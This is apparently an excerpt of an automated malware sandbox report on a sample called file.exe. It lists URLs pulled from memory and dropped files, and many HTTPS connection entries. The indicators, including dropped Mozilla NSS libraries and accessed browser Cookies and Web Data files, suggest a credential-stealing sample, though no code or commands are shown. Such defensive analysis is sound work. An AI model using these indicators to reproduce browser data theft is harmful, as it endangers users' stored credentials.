Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
Source: HubApps Icons.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_dark.png/1.3.20/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_hc.png/1.3.20/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_light.png/1.3.20/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_sound_cloud.png/1.0.3/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_dark.png/1.2.19/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_hc.png/1.2.19/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_light.png/1.2.19/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_telegram.png/1.0.4/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_hc.png/1.0.5/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_dark.png/1.0.5/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_light.png/1.0.5/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tidal.png/1.0.3/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tik_tok_light.png/1.0.5/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
Source: HubApps Icons.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whats_new.png/1.0.0/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whatsapp_light.png/1.4.11/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_youtube.png/1.4.14/asset
Source: 000003.log6.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/signal_triggers/1.13.3/asset?sv=2017-07-29&sr=c&sig=Nt
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://excel.new?from=EdgeM365Shoreline
Source: chromecache_474.4.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
Source: chromecache_474.4.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
Source: chromecache_474.4.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
Source: chromecache_474.4.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://gaana.com/
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://i.y.qq.com/n2/m/index.html
Source: 2cc80dabc69f58b6_1.8.dr	String found in binary or memory: https://img-s-msn-com.akamaized.net/
Source: 2cc80dabc69f58b6_1.8.dr	String found in binary or memory: https://img-s.msn.cn/tenant/amp/entityid/
Source: JKEGHDGHCGHDHJKFBFBK.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://latest.web.skype.com/?browsername=edge_canary_shoreline
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://m.kugou.com/
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://m.soundcloud.com/
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://m.vk.com/
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://manifestdeliveryservice.edgebrowser.microsoft-staging-falcon.io/app/page-context-demo
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: Cookies.9.dr	String found in binary or memory: https://msn.comXID/
Source: Cookies.9.dr	String found in binary or memory: https://msn.comXIDv10Z
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://music.amazon.com
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://music.apple.com
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://music.yandex.com
Source: 2cc80dabc69f58b6_1.8.dr	String found in binary or memory: https://ntp.msn.cn/edge/ntp
Source: 000003.log0.8.dr, 2cc80dabc69f58b6_0.8.dr	String found in binary or memory: https://ntp.msn.com
Source: 000003.log9.8.dr	String found in binary or memory: https://ntp.msn.com/
Source: 000003.log9.8.dr	String found in binary or memory: https://ntp.msn.com/0
Source: QuotaManager.8.dr	String found in binary or memory: https://ntp.msn.com/_default
Source: 2cc80dabc69f58b6_1.8.dr, 000003.log9.8.dr	String found in binary or memory: https://ntp.msn.com/edge/ntp
Source: 000003.log9.8.dr	String found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
Source: Session_13375862603640737.8.dr	String found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
Source: QuotaManager.8.dr	String found in binary or memory: https://ntp.msn.com/ntp.msn.com_default
Source: 2cc80dabc69f58b6_0.8.dr	String found in binary or memory: https://ntp.msn.comService-Worker-Allowed:
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://open.spotify.com
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://outlook.live.com/mail/0/
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://outlook.office.com/mail/0/
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
Source: chromecache_474.4.dr	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chromecache_476.4.dr	String found in binary or memory: https://plus.google.com
Source: chromecache_476.4.dr	String found in binary or memory: https://plus.googleapis.com
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
Source: 2cc80dabc69f58b6_1.8.dr	String found in binary or memory: https://sb.scorecardresearch.com/
Source: 2cc80dabc69f58b6_1.8.dr	String found in binary or memory: https://srtb.msn.cn/
Source: 2cc80dabc69f58b6_1.8.dr	String found in binary or memory: https://srtb.msn.com/
Source: KECFIDGCBFBAKEBFBKFBFBAFII.0.dr	String found in binary or memory: https://support.mozilla.org
Source: KECFIDGCBFBAKEBFBKFBFBAFII.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: KECFIDGCBFBAKEBFBKFBFBAFII.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://tidal.com/
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://twitter.com/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.8.dr	String found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.8.dr	String found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.8.dr	String found in binary or memory: https://unitedstates4.ss.wd.microsoft.us/
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://vibe.naver.com/today
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://web.skype.com/?browsername=edge_canary_shoreline
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://web.skype.com/?browsername=edge_stable_shoreline
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://web.telegram.org/
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://web.whatsapp.com
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://word.new?from=EdgeM365Shoreline
Source: chromecache_476.4.dr	String found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
Source: file.exe, 00000000.00000002.2571406052.00000000232A2000.00000004.00000020.00020000.00000000.sdmp, JKEGHDGHCGHDHJKFBFBK.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: file.exe, 00000000.00000002.2571406052.00000000232A2000.00000004.00000020.00020000.00000000.sdmp, JKEGHDGHCGHDHJKFBFBK.0.dr	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://www.deezer.com/
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: FCFBAKJD.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: KKEHIEBK.0.dr, FCFBAKJD.0.dr, Web Data.8.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 4bb3cbda-4223-42eb-9166-e2269eaddeda.tmp.9.dr	String found in binary or memory: https://www.googleapis.com
Source: chromecache_476.4.dr	String found in binary or memory: https://www.googleapis.com/auth/plus.me
Source: chromecache_476.4.dr	String found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
Source: chromecache_474.4.dr	String found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
Source: chromecache_474.4.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
Source: chromecache_474.4.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://www.iheart.com/podcast/
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://www.instagram.com
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://www.last.fm/
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://www.messenger.com
Source: KECFIDGCBFBAKEBFBKFBFBAFII.0.dr	String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.2547238777.0000000000E97000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: file.exe, 00000000.00000002.2547238777.0000000000E97000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/IJKJKECAKEGC
Source: file.exe, 00000000.00000002.2547238777.0000000000E97000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/dHh0
Source: KECFIDGCBFBAKEBFBKFBFBAFII.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: file.exe, 00000000.00000002.2547238777.0000000000E97000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: file.exe, 00000000.00000002.2547238777.0000000000E97000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0
Source: KECFIDGCBFBAKEBFBKFBFBAFII.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000002.2547238777.0000000000E97000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.2436739068.00000000233CA000.00000004.00000020.00020000.00000000.sdmp, KECFIDGCBFBAKEBFBKFBFBAFII.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: KECFIDGCBFBAKEBFBKFBFBAFII.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2436739068.00000000233CA000.00000004.00000020.00020000.00000000.sdmp, KECFIDGCBFBAKEBFBKFBFBAFII.0.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000002.2547238777.0000000000E97000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000002.2547238777.0000000000E97000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/ds:
Source: file.exe, 00000000.00000003.2436739068.00000000233CA000.00000004.00000020.00020000.00000000.sdmp, KECFIDGCBFBAKEBFBKFBFBAFII.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: file.exe, 00000000.00000002.2547238777.0000000000E97000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
Source: 2cc80dabc69f58b6_1.8.dr	String found in binary or memory: https://www.msn.com/web-notification-icon-light.png
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://www.office.com
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://www.tiktok.com/
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://www.youtube.com
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://y.music.163.com/m/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 54597 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54631 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54654 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 54711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 54562 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54642 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54516 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54688 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54527 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 54618 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 54666 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54505 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54689 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54550 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54539 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54630 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54607 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 54655 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 54712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 54561 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 54664 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 54687 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54549 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54526 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54503 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 54537 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54621 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 54572 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54632 -> 443
